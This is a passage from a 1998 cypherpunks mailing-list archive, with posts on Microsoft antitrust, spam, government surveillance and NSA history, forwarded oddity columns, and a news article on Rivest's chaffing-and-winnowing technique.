reasonable price, with GUI's that are usable by people who desire
to be able to use a computer without becoming a dweeb/guru/expert.
 
> Microsoft shouldn't be blamed because they were smarter than the rest
> of the industry, and when they couldn't be smarter, well, buying the
> other company works too.  Every one of you would do it the same way if
> you were Bill Gates running the largest software empire in the world,
> whether you would like to admit it or not.

This is exactly what the Anti-Micro$not Coalition is attempting. Instead
of making their software available to M.E. Tarzan and U. Jane at a
competitive price, they are attempting to prevent someone who sought
and got (Hey! I'm a poet...) their business from offering them even
more affordable software extensions to their basic operating system.
If providing the end-user with the tools to use their modem and the
InterNet is an anit-trust violation, then shouldn't the same concept
apply to OS vendors who provide tools for their customers to use
their printers, etc?

The much maligned 'Sheeple' desire only to have an OS that provides
them with the tools to use the products that they purchase from 
computer vendors.
The fact that Macintosh suffered in the marketplace from offering a
complete package for more money, while the PC vendors offered a more
affordable package which required additional purchases of software
to accomplish the same ends, is not a reflection on the stupidity
of J&J Q. Public. It is a reflection on the ignorance/unwillingness
of Apple to properly advertise the discrepancies in entry-level costs
versus end-result costs.
Tire companies are taking advantage of the shennanigans of their
competition by pointing out that their prices include such 'additional
items' such as valve stems, balancing, air, etc. Apple and Sun were
not constrained by Micro$not from doing the same thing.

Many of the UNIX/SCO systems that I sold to my customers were the 
result of my explaining cost-benefit ratios which I had to analyze
for myself, with no help from those actually producing/selling the
product.
As a former vendor who sold operating systems which were in comptetion
with DOS/Windows, despite the fact that their manufacturers were not
actively seeking my business, I feel no compunction in calling them
to task for attempting to suppress their competition by calling upon
the government to make them quit giving the public what they desire.

Sincerely,
...uuuhh...I can't remember what persona I am posting under...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Spectre <spectre@anthrax.net>
Date: Sat, 21 Mar 1998 06:13:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Faked mail from canada? (was : Clarification / Re: UPSs  (yeah, it's off topic))
In-Reply-To: <B0000003934@hades.crmcom.com>
Message-ID: <Version.32.19980321091107.00dbc8c0@mail2.anthrax.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

>Yes I do...
>	|                                  |
>	|        Watch For CypherPunks     |
>	|                                  |
>	|         Next Ten Posts           |

I'm on coderpunks, not  cypherpunks... my message must have been cc'd or
something, I wasn't paying attention.


- -The Spectre [SP4 w/ Clam Cluster]
- -http://www.anthrax.net/cos
"No man is clever enough to know all the evil he does."  -  La Rochefoucauld

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.2

iQA/AwUBNRPY5qYe2JEM7RcqEQIZZgCdHxf8Tn5AWVRbwhuEDJDx4iMVHCUAn3dC
kMLC2///N6kZtogQYCWummyJ
=OKCU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 21 Mar 1998 08:42:08 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re:
Message-ID: <199803211642.LAA14885@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 3/21/98 2:42 AM, Anonymous (anon@anon.efga.org)  passed this wisdom:

>Life itself is a double-edged sword. To compete with the shotgun 
>spammers, those who wish to target an audience which is likely to 
>have a specific interest in their product or cause have need of a 
>database which will help them to categorize the interests of those 
>who traverse the <WWW.> In doing so, they run the risk of being 
>lumped in with those who use the same technology to monitor the 
>same users in order to work against their self-interest.  

 Exactly, to lump all mass emailers into one homogenous category is all
wrong. I subscribe to a list people running Mac Performa series 
PowerPCs (almost all PPC 603/e)/v). We recently had someone who had
apparently subscribed to the list and lurked and built up a mailing list
of posters to the list to whom he later sent a solicitation ... it was
quite appropriate and as targetted as you can get, active participants
in a highly specific group ... you shopuld have heard the weeping an
gnashing of teeth ... the bandwidth comsumed by compliants was a
thousand fold greater than the solicitation itself!

 SPAM is the boogeyman of the hour. Yes there are bad spammers out there
and a modest knowledge of your mail client will handle 95% of them
straight to File 13, but I really do want to receive many of the
solicitations I get, I actually do buy things ...

 Just my .02

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNRPt0T7r4fUXwraZAQGLzwf+MHxH65MoIWtch+sOqgOkEkJX6CKQWHGK
QaF411/xf3Yma2zQpV0Vu9UqcHaqBXf+HFxgEmh8hDfneTQHOa81IX9zZPBQ2EXv
qeo+ANIDzJzUNSQ+V1SKkgWzDF74VVPXTfBElYYvoox+9LMwHyzTcSiUh4JaN9EN
5cpkyvq+rgzv0QuIHKileSDZRW3BfXK8jA/yUCZ/WkV3eWG4RNavR+Cv7PCsGq4j
f9YCrd6cU+4cs4g2gpA8Oc9HK5sKquNrChQY1lZc3hWeFCyKO1uc/8eIAX3MxVAV
cRtvJ/SLMqcd+FNIiEstCNCs7SsGB37jbO9RdmY4ZNLxZgtk/BVojQ==
=87S8
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "The woods would be very silent if no birds sang there except those 
  that sing the best."    -- Henry David Thoreau






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sat, 21 Mar 1998 19:30:59 -0800 (PST)
To: StanSquncr <cypherpunks@toad.com
Subject: Re: My Most Abject Apologies
In-Reply-To: <981698d1.351441e6@aol.com>
Message-ID: <3514B012.A3945B3D@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


StanSquncr wrote:
> 
> In a message dated 98-03-21 02:51:23 EST, you write:
> 
> << OTOH I hear , liberally intermingled, >>

WHat I mean is that 2/3 of the posts say they are screwing us out of our
rights and 2/3 talk about proof and evidence.  Yeah that means that some
talk about both.






> 
> Like what do you mean by "liberally intermingled"?
> 
> << that the government blows off our
>  rights (and more importantly, what is Right) ... >>
> 
> Starting with the Constitution/Bill of Rights (Article 6 part III and
> Amendment 14, in particular).
> 
> << ... and themes like proof and
>  evidence. >>
> 
> It's the right-wing that's doing that (and, see above).
> 
> 
> << First, the Powers That Be feel free to invent the "evidence" that they
>  need. >>
> 
> I'm sure it's happened (like anytime the police want to arrest a black person,
> for instance).
>

Or anyone else they decide to do it to.
 
> 
> << Second, I would not believe someone's own hard drive to give an accurate
>  depiction of EMail activity.  Deleting anything incriminating is easy
>  enough, so it not being there shows (much less Proves) nothing.  And it
>  is relatively simple to alter stored EMail, so that does no more good. >>
> 
> Right.  So delete your incriminating evidence, and save anything you send to a
> list (which they could get a copy of anyway.)
>

The thing is that *I* can get the list stuff myself if it ever gets
anywhere.  (Methinks that algebra is having problems these days)

 
> << If them people want to screw me, let them do all of the work for
>  themselves. >>
> 
> Now THAT I totally agree with you on.  :-)
> 
> Stan


Besides I find very little of all this that deserves more than a thought
or two and those that do are stored in my "Mark VI Between The Ears
Onboard Computer".

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew fabbro <afabbro@umich.edu>
Date: Sat, 21 Mar 1998 21:08:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Crypto, anyone?
Message-ID: <Pine.LNX.3.95.980321234631.4621C-100000@brokenarrow.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was just wondering if anyone would be interested in discussing
cryptography, personal privacy, security protocols, digital signatures,
anonymous remailers, digital cash, crypto anarchy...?  No?  OK, then we
can go back to spam, Microsoft bashing, calling each other "idiots" and
"chickens," and forwarding News of the Weird for no obvious reason.


-- 
 Andrew Fabbro   [afabbro@umich.edu]   [andrewf@jesuswept.com]
 http://www-personal.umich.edu/~afabbro/          313.647.2713 
 "We make money the old fashion way. We print it." - DigiCrime





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sat, 21 Mar 1998 21:48:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: My Most Abject Apologies
Message-ID: <4a5fa05.3514a5d6@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-21 22:31:05 EST, paulmerrill@acm.org writes:

<< > In a message dated 98-03-21 02:51:23 EST, you write:
 > 
 > << OTOH I hear , liberally intermingled, >>
 
 WHat I mean is that 2/3 of the posts say they are screwing us out of our
 rights and 2/3 talk about proof and evidence.  Yeah that means that some
 talk about both. >>

Yea, but what I mean is, who are they accusing (the liberals, I'm guessing
(sorry cypher's, got a big gig coming up Friday night and I haven't been able
to read everything))?
 
 
<< > I'm sure it's happened (like anytime the police want to arrest a black
person,
 > for instance).
 >
 
 Or anyone else they decide to do it to. >>

Well, I'm normally a long-haired hippie, so I know what you're talking about.
That's part of our history.  But these days, at least here in Houston, they
seem to be laying off of us a bit, as they really have an idea who's giving
them the troubles (and it's the drunk cowboys in their pickup truck, they get
in a whole lot of wrecks!)

Oh, they still get us, though (through piss-testing (this ain't a 'Democracy'
anymore, it's 'Corporate Rule'))!

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Sat, 21 Mar 1998 23:17:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Emptying the trash...
Message-ID: <3514D686.5580@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


[Sent to Netscape feedback defartment]

The next trash I will be emptying will be my installation of Netscape.

Netscape has been my only browser since gaining InterNet access, but I
am not going to
use a product from a company who requires me to jump through hoops to
ensure privacy through strong encryption and then tells me to fuck off
because they are incapable of verifying my net persona and/or location.

If Netscape intends to make their software compliant with the wishes of
those who want to illegally monitor my location and identity, then they
should at least require those fascists to supply you with this
information for you to use for my convenience in acquiring your product.

I send weekly death threats to Bill Gates, but I'll bet my ass that
Micro$not lets me download their browser so that he can go to his grave
clutching my cash in his hand.

~~~~
Toto <president@whitehouse.gov>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 21 Mar 1998 17:05:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: And they all work for the government...
Message-ID: <199803220105.CAA03456@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


* The London Daily Telegraph reported in January on the thriving
addiction clinics of Dr. Robert Lefever, who specializes in helping
people who are obsessed with helping other people.  Among the
500 patients a year he sees in London and Kent are a number of
women who compulsively marry alcoholics so they can cure them. 
Another recent patient was hospitalized for exhaustion after
caretaking an overweight woman, including obsessively rolling her
in her wheelchair to many places she did not want to go. 

~~~~~~~~~~~~~~~~~
NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 21 Mar 1998 17:07:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: CypherPunk Flame Wars...
Message-ID: <199803220106.CAA03752@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


::
Anon-To: cypherpunks@toad.com

::
Anon-To: cypherpunks@toad.com

* In a September issue of New Scientist magazine, researchers in
Germany wrote that a type of hermaphroditic flatworm mates
through what they call "penis fencing."  In the presence of another,
a worm lashes out with its penis to attempt to inject sperm, but the
potential mate might have similar ideas itself, and in bouts that last
up to an hour, each attempts to inseminate the other.  Often both
worms are left severely punctured. 

~~~~~~~~~~~~~~~~~
NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 21 Mar 1998 17:07:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: ClueServer Permanently Down...
Message-ID: <199803220107.CAA03879@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


* Latest prices charged by parents to sell their kids (Covington,
La., January, $7,400; Orlando, Fla., January, $1,000); latest game
of automobile chicken that ended in a tie (Michigan Center, Mich.,
January, three hospitalized, one in critical condition); latest
attempted robbery in which the unarmed perp simulates a gun with
his thumb and forefinger but doesn't have his hand in his pocket at
the time (La Ronge, Saskatchewan, December, not surprisingly,
coming away with no money).

~~~~~~~~~~~~~~~~~
NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 21 Mar 1998 17:09:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Dimitri's Tentacles...
Message-ID: <199803220108.CAA04973@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


* In September, Mr. Anoki P. Sultan filed a lawsuit in Washington,
D.C., against Roman Catholic Archbishop James Hickey, claiming
that the Church was responsible for the devil's taking over his body
in 1983.  Sultan said that would account for his being out of work
so much, dropping out of college, seeking mental-health treatment,
smoking cigarettes, speaking in tongues, and engaging in
homosexual acts.  He sought either $100 million or an exorcism. 
(The lawsuit was dismissed.) 

~~~~~~~~~~~~~~~~~
NEWS OF THE WEIRD, founded in 1988, is a nationally syndicated
newspaper column distributed by Universal Press Syndicate.  To
receive the columns by e-mail, free of charge, send a message to
notw-request@nine.org with the Subject line of Subscribe.  To read
these News of the Weird newspaper columns from the past six months,
go to http://www.nine.org/notw/notw.html  (That site contains no
graphics, no photos, no video clips, no audio.  Just text.  Deal
with it.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an105@hotmail.com
Date: Sun, 22 Mar 1998 02:46:46 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: stand-by
Message-ID: <011297055501222@mix1.Sacramento.mci.net>
MIME-Version: 1.0
Content-Type: text/plain





                Hi, after adjusting claims for several insurance companies, I
found one thing the same.  No one seems to know much about what they are
entitled to.  So I decided to help the public towards even footing with 
insurance adjusters. 

                I have been a crusader for policyholder's rights for a good many
years since and received acclaim from state departments' of insurance 
and state Governors for my work, albeit obscure.  Anyway, you may want
to bookmark my "deserve" website just in case that rainy day happens to 
come your way.

               Socrates never sold insurance, but his words apply to this
industry as well:  "The only good is knowledge and the only evil is
ignorance."

                                                       Best wishes,

                                                       Tony Braga

deserve link:  http://www.sure-net.com/deserve.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 21 Mar 1998 20:33:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 9/0 -- SPACE ALIENS HIDE MY DRUGS
Message-ID: <199803220433.FAA28959@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Prologue 9/0 -- SPACE ALIENS HIDE MY DRUGS
------------------------------------------

Magic Circle:

Writing from his room in the Grand Hotel Principe in Limone Piemonte, 
Jones thanked his old friend for the words of encouragement. The honor,
said Sir Eric, "has been won by a lot of hard work by very many people
within the circle and on the fringes of it, and it has also been partly
won by friendly cooperation from people." 


Parker Paradox:

Representing GCHQ at NSA during the mid-1960s was Reginald H. Parker, 
a dashing Englishman with an infectious sense of humor.


Early Members of the Circle of Eunuchs:

Official eavesdropping in Britain is steeped in tradition and shrouded 
in secrecy. Even Shakespeare made note of the practice when he wrote in 
Henry V, "The king hath note of all that they intend / By interception 
which they dream not of." 

Britain's Royal Mail Openers managed a charmed existence. Their single 
public scandal occurred in 1844, when Joseph Mazzini charged Secretary 
of State Sir James Graham with opening his letters and passing the 
contents on to the Neapolitan government.

John Goldhammer of Commercial Cable Company and Clarence H. Mackay of
Commercial Cable Postal Telegraph Company. "In July, 1919," explained
Goldhammer, "when British censorship ceased, we were ordered by the 
British Government to turn over to them all messages passing between 
our own offices, 10 days after they were sent." 

The original and primary source for information on ECHELON is an 
article I wrote in New Statesman magazine ten years ago : NS, 12 August 
1988 : "They've got it taped".  

To forge this alliance, the NSA, soon after it was formed, established 
the National Security Agency Scientific Advisory Board (NSASAB), a 
ten-member panel of science wizards plucked from ivy-covered campuses,
corporate research labs, and sheepskin-lined think tanks. 
Among the early members of the board was Stewart S. Cairns, who had 
earned his doctorate at Harvard and was chairman of the mathematics 
department at the University of Illinois at Urbana (the same school 
where William Martin, not long before his defection, would be sent on 
a two-year scholarship).

When Vice Admiral Laurence Frost arrived at the Puzzle Palace in the 
fall of 1960, he found relations between the board and NSA strained and 
bitter. 


I LUV FUD! (The Medium is the Enemy):

In 1956 Dr. Howard T. Engstrom, a computer wizard and vice president of 
Remington Rand, took over NSA's research and development organization. 
The following year he was appointed deputy director of NSA and a year
later returned to Remington Rand. 

Joseph H. Ream, executive vice president at CBS, was imported to 
replace Engstrom as deputy director. He, too, left after a year; he 
headed up CBS's Washington office and later CBS-TV's programming 
department.
Ream's interlude at NSA is listed on his CBS biography simply as 
"retirement." 

Three months before Ream gave up codebreaking for "I Love Lucy," one of 
the most important meetings in the history of the Agency took place in 
a clapboard structure on Arlington Hall Station known as B Building. On 
July 18, 1957, a handful of the nation's top scientists crowded 
together in NSA's windowless Situation Room to present a blueprint for 
the Agency's future technological survival.* 


Nuclear PigLatin:

They...recommended the initiation of a Manhattan Project-like effort to 
push the USA well ahead of the Soviet Union and all other nations in 
the application of communications, computer science, mathematics, and 
information theory to cryptology.


Rear Entry:

Now the decision had to be made about whether to continue funding, as 
with Lightning, generalized, public research or to begin to direct 
those funds toward secret, specialized, cryptologic research. It was a 
choice between an open bridge or a hidden tunnel between the Agency and 
the outside scientific community. Following the Baker report, the 
decision was to use the tunnel.


Lost Alamo Chaos:

The CRD's statistics are, however, a bit misleading. Shortly after the 
division's birth, several programs were launched to bring into the 
secret fraternity several dozen of the nation's most outstanding 
academic minds in mathematics and languages.


The Evil One Writes Black Operatives A Blank Check:

"NSA," the Agency declared with all due modesty, "certainly hastened 
the start of the computer age." Among the early products of that age 
was the use of computers in the banking industry for everything from 
the massive transfers of money between banks and other financial 
institutions, to the simple recording of a midnight transaction at a 
remote automatic teller. But there was another product: computer crime. 
With sufficient knowledge and the access to a terminal, one could trick 
the computer into transferring funds into a dummy account or tickle a 
cash-dispensing machine into disgorging its considerable holdings. 


Caveat Emptor [WAS: Of course I luvs you...I fucks you, don't I?]:

IBM board chairman Thomas Watson, Jr., during the late 1960s set up a 
cryptology research group at IBM's research laboratory in Yorktown 
Heights, New York. Led by Horst Feistel, the research group concluded 
its work in 1971 with the development of a cipher code-named Lucifer, 
which it promptly sold to Lloyd's of London for use in a 
cash-dispensing system that IBM had developed. 

IBM developed Lucifer with a key 128 bits long. But before it submitted 
the cipher to the NBS, it mysteriously broke off more than half the 
key. 


Government Encryption...There's A Method In Their Madness:

>From the very beginning, the NSA had taken an enormous interest in 
Project Lucifer. It had even indirectly lent a hand in the development 
of the S-box structures.


Debbie Does Ca$h:

The Agency, in turn, certified the algorithm as "free of any 
statistical or mathematical weaknesses" and recommended it as the best 
candidate for the nation's Data Encryption Standard (DES). 


DC Does Chelsea:

The cozy relationship that the Agency had fostered with IBM would be
impossible with the free-wheeling academics. Nevertheless, virtually 
all the researchers had an Achilles' heel: the National Science 
Foundation. 


D'Shauneaux Does DC:

Vice Admiral Bobby Inman moved into the Puzzle Palace, replacing newly 
promoted General Lew Allen, Jr.


Fear:

Without any authorization, he wrote a threatening letter to the 
Institute of Electrical and Electronic Engineers (IEEE), the nation's 
largest professional engineering society (of which he was a member), 
warning that those planning to participate in an upcoming IEEE 
symposium on cryptology might violate the law. 

Uncertainty:
What Meyer emphasized was that ITAR covered the export not only of 
actual hardware, but also of unclassified technical data associated 
with the restricted equipment. 

Disinformation:
He claimed that holding symposia and publishing papers on cryptology 
were the same as exporting the information. Thus, he concluded, "unless 
clearances or export licenses are obtained" on some of the lectures and 
papers, "the IEEE could find itself in technical violation of the 
ITAR." 


"When time is of essence, he'll rise from the ash.":

Nicolai had suddenly been assaulted with one of the oldest weapons in 
the nation's national security arsenal: the Invention Secrecy Act. 
Passed in 1917 as a wartime measure to prevent the publication of 
inventions that might "be detrimental to the public safety or defense 
or might assist the enemy or endanger the successful prosecution
of the war," the measure ended with the conclusion of World War I. The 
act was resurrected in 1940 and was later extended until the end of the 
Second World War. Then, like the phoenix, it once again rose from the 
ashes with the passage of the Invention Secrecy Act of 1951, which 
mandated that secrecy orders be kept for periods of no more than one 
year unless renewed. There was a catch, however. The act also said that 
a secrecy order "in effect, or issued, during a national emergency 
declared by the President shall remain in effect for the duration of
the national emergency and six months thereafter." Because no one ever 
bothered to declare an end to President Truman's 1951 emergency, the 
emergency remained in effect until September 1978. 


The Zimmermann Lineage:

To add insult to injury, Nicolai was planning to market his Phasorphone 
at a price most buyers could easily afford, about $100, thus increasing 
the interest in the technology. 


Ted Turner Loves Lucy, Too:

The director's tactic was to launch a counterattack on two fronts--one 
in the open and the other behind the scenes. On the open front, Inman 
decided to convert to his own use what he believed was his opponent's 
biggest weapon: the media. 
Now he himself would begin manipulating the press for the Agency's 
benefit. 


Born Classified/Oppressed/Repressed/Depressed:

But Inman's most telling comment was his statement to Shapley that he 
would like to see the NSA receive the same authority over cryptology 
that the Department of Energy enjoys over research into atomic energy. 
Such authority would grant to NSA absolute "born classified" control 
over all research in any way related to cryptology. 


PGP ProphetSized:

Warned Inman:
     Application of the genius of the American scholarly community to 
     cryptographic and cryptanalytic problems, and widespread 
     dissemination of resulting discoveries, carry the clear risk that 
     some of NSA's cryptanalytic successes will be duplicated, with a 
     consequent improvement of cryptography by foreign targets. No less 
     significant is the risk that cryptographic principles embodied in
     communications security devices developed by NSA will be rendered
     ineffective by parallel nongovernmental cryptologic activity and 
     publication.


Voluntary 'Dog At Large'Fines:

Recognizing the constitutional questions involved in such drastic 
actions, the study group decided on a middle ground: a system of 
voluntary censorship. 


Elvis Assassinated By The Men In Black:

Faurer, addressing a meeting of the IEEE, left little doubt that to 
ignore the Center would be to risk saying good-by to lucrative 
government contracts. "Frankly," the NSA chief warned, "our intention 
is to significantly reward those DOD suppliers who produce the computer 
security products that we need." 


Monkeywrenching Dave Null:

Lack of such cooperation, CIA Deputy Director Inman said at the 
Center's opening, "might lead to a highly undesirable situation where 
private-sector users (e.g., banks, insurance companies) have higher 
integrity systems than the government." 


Voluntary/Mandatory:

As a result of what he called the "hemorrhaging of the country's 
technology," Inman warned a meeting of the American Association for the 
Advancement of Science that "the tides are moving, and moving fast, 
toward legislated solutions that in fact are likely to be much more 
restrictive, not less restrictive, than the "voluntary" censorship 
system of the Study Group. 


[ADVERTISEMENT] Nuclear Hoover Vacume Gets ALL The Dirt:

On the other hand, drug dealers were not the only ones who unwittingly 
found their way into NSA's magnetic-tape library. Also captured were 
the hungry demands of wayward congressmen insisting on bribes from 
foreign governments.


You Have A Right To Be Monitored:
You Have A Right To Be Kept In The Dark:
You Have A Right To No Counsel:

The key to the legislation could have been dreamed up by Franz Kafka: 
the establishment of a supersecret federal court. Sealed away behind a 
cipher-locked door in a windowless room on the top floor of the Justice
Department building, the Foreign Intelligence Surveillance Court is 
most certainly the strangest creation in the history of the federal 
Judiciary.

Almost unheard of outside the inner sanctum of the intelligence 
establishment, the court is like no other. It sits in secret session, 
holds no adversary hearings, and issues almost no public opinions or 
reports. It is listed in neither the Government Organizational Manual 
nor the United States Court Directory and has even tried to keep
its precise location a secret. "On its face," said one legal authority 
familiar with the court, "it is an affront to the traditional American 
concept of justice." 

You Have A Right To Bend Over:

Under such circumstances, it is little wonder that the federal
government has never lost a case before the court.


Legalizing WaterGate:

When the Reagan administration came into office, however, the Justice 
Department argued that the power for foreign intelligence black-bag 
jobs was vested not in the court, but in the inherent authority of the
President. Presiding Judge Hart, in the court's only published opinion, 
agreed. Thus, in rejecting the administration's application for a new 
surreptitious entry, he was in fact going along with the argument of 
the Justice Department. As a result the rejected break-in and all 
subsequent surreptitious entries need no court authorization, only 
presidential approval. 


Rule of Obscurity [WAS: Rule of Law]:

Even more disturbing than the apparent evolution of the surveillance 
court into an Executive Branch rubber stamp are the gaping holes and 
clever wording of the FISA statute, which nearly void it of usefulness. 
Such language, intentional as well as unintentional, permits the NSA to 
rummage at will through the nation's international telecommunications 
network and to target or watch-list any American who happens to step 
foot out of the country. 


The Information Surveillance Highway:

"Electronic surveillance," the statute reads, means "the acquisition by 
an electronic, mechanical, or other surveillance device" of the 
approved targets. But nowhere does the statute define the meaning of 
the key word acquisition. Rather, it is left to NSA to define.


The Inlsaw/Indio Reservation Gambling Gambit:

Thus it is possible for GCHQ to monitor the necessary domestic or 
foreign circuits of interest and pass them on to NSA through the UKUSA 
Agreement. Once they were received, NSA could process the 
communications through its own computers and analysts, targeting and 
watch-listing Americans with impunity, since the action would not be 
covered under the FISA statute or any other law. 


Debbie Does Deputy Dog:

No such exclusion, however, was ever included in the final FISA 
statute. Instead, the statute now calls for what one constitutional law 
expert has termed "compulsory spy service," requiring "communications 
common carriers, their officers, employees, and agents . . . to provide 
information, facilities, or technical assistance to persons
authorized by law to intercept wire or oral communications or to 
conduct electronic surveillance" and also ordering them to protect the 
secrecy of the operations. 


CAMP Revisited / Crypto Uzis for Deputy Dog:

Under the Reagan executive order, the NSA can now, apparently, be 
authorized to lend its full cryptanalytic support--analysts as well as 
computers--to "any department or agency" in the federal government and, 
"when lives are endangered," even to local police departments. 


David Waters Predicts SmartSSNCards:

     Tons of electronic surveillance equipment at this moment are 
     interconnected within our domestic and international common 
     carrier telecommunications systems. Much more is under contract 
     for installation. Perhaps this equipment is humming away in a 
     semi-quiescent state wherein at present "no citizen is targeted"; 
     simply scanned. . . How soon will it be, however, before a punched 
     card will quietly be dropped into the machine, a card having your 
     telephone number, my telephone number, or the number of one of our 
     friends to whom we will be speaking? 


And once we've rid ourselves of those pesky humans...:

"HUMINT [Human Intelligence] is subject to all of the mental 
aberrations of the source as well as the interpreter of the source," 
Lieutenant General Marshall S. Carter once explained. "SIGINT isn't. 
SIGINT has technical aberrations which give it away almost immediately 
if it does not have bona fides, if it is not legitimate. A good
analyst can tell very, very quickly whether this is an attempt at 
disinformation, at confusion, from SIGINT. You can't do that from 
HUMINT; you don't have the bona fides--what are his sources? He may be 
the source, but what are his sources?" 


Chuck Conners Appointed To Supreme Court--Cows Nervous:

Can it be that the Constitution affords no protection against such 
invasions of individual security? * 

     * Justice Brandeis answered his own question when he quoted from 
     Boyd v. United States (116 u.s. 616): "It is not the breaking of 
     his doors, and the rummaging of his drawers that constitutes the 
     essence of the offense; but it is the invasion of his indefensible 
     right of personal security, personal liberty, and private 
     property. (277 U.S.438, at pages 474-475.) 


Army of (Black) Dog / Take A Bite Out Of Technotyranny:

I don't want to see this country ever go across the bridge. I know the 
capacity that is there to make tyranny total in America, and we must 
see to it that this agency and all agencies that possess this
technology operate within the law and under proper supervision, so that 
we never cross over that abyss. That is the abyss from which there no 
return.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 21 Mar 1998 22:40:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Crypto, anyone?
Message-ID: <199803220640.HAA13967@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


andrew fabbro wrote:
> 
> I was just wondering if anyone would be interested in discussing
> cryptography, personal privacy, security protocols, digital signatures,
> anonymous remailers, digital cash, crypto anarchy...?  No?  OK, then we
> can go back to spam, Microsoft bashing, calling each other "idiots" and
> "chickens," and forwarding News of the Weird for no obvious reason.

What the fuck is crypto? Can you *say* that on a public mailing
list?
Isn't child cryptography illegal?
Isn't sharing pubic keys a form of perversion?
Is digital cash used to buy a blow-job?

"How can you tell when Windows is about to crash?"
	"It boots."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Mar 1998 06:56:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Rivest's Chaffing and Winnowing
Message-ID: <199803221456.JAA07529@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, March 22, 1998, p. 31.

   New Method To Veil Data Could Upstage Export Policy 

      Cryptologists find a way to foil eavesdroppers without
      secret codes.

   By John Markoff

   San Francisco, March 21 -- One of the nation's leading
   computer scientists has proposed a novel technique for
   scrambling data that could circumvent Government export
   policies aimed at limiting the foreign sale of encryption
   technology.

   The technique, which was described this week in an Internet
   discussion among computer researchers, was introduced by
   Ronald L. Rivest, a computer scientist at the Massachusetts
   Institute of Technology and one of the inventors of the
   most widely used commercial encryption scheme, RSA.

   The new approach, which is described in a short technical
   paper that has been posted to Mr. Rivest's M.I.T. Web site
   (http://theory.lcs.mit.edu/~rivest/chaffing.txt), is
   described as "chaffing and winnowing" digital information
   instead of encrypting it.

   According to Mr. Rivest's paper, it is possible to hide a
   message by breaking it into packets that are then secretly
   identified as good information, or "wheat," and gibberish,
   or "chaff," in such a way that an eavesdropper cannot
   distinguish the two.

   Because the individual packets would not be encrypted, Mr.
   Rivest said, such a system would circumvent current export
   restrictions.

